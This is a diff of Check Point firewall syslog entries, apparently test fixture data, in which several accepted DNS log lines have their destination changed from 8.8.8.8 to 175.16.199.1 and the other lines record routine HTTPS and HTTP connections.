 <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x12,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"22"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"104.108.173.172"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"34228"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x13,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"23"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51822"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x13,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"23"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51822"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x14,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"24"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"104.81.140.246"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"57360"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x15,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"25"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"104.108.173.172"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"34232"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x16,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"26"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"13.53.104.115"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53258"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x18,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"27"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"104.81.140.246"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"57366"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x19,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"28"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"185.33.223.80"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"46392"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x1a,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"29"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"172.217.19.194"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"55770"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x1b,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"30"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45179"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x1b,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"30"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45179"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d916,0x1c,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"31"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"33466"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10002"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x1d,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"32"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"172.217.20.66"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"59890"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d916,0x1e,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"33"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42261"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d916,0x1f,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"34"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"48788"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10003"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d916,0x20,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"35"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41829"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d916,0x21,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"36"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"36408"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10004"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x22,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"37"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60238"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x23,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"38"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49507"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x24,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"39"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36205"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x25,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"40"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53772"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x22,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"37"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60238"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x23,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"38"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49507"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x24,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"39"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36205"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x25,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"40"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53772"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x26,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"104.26.6.155"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58600"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36552"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39733"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43005"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56632"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
